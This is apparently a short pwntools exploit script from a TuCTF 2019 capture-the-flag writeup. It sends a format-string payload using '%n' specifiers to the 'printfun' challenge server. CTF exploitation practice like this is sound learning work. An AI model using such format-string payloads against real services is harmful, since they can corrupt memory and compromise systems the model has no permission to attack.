from pwn import *
from struct import pack

elf = ELF('./printfun')
context.binary = './printfun'

# FORMAT STRING VULNERABILITY!

payload = 'this is mind blowing! %6$n%7$n' # We use Format String exploitation. Google it

# r = elf.process()
r = remote('chal.tuctf.com', 30501)
r.clean()
r.sendline(payload)
r.clean()
r.readline()

Original writeup (https://github.com/AshishKumar4/CTF_Writeups/blob/master/TuCTF_2019/PWN/printfun/exploit.py).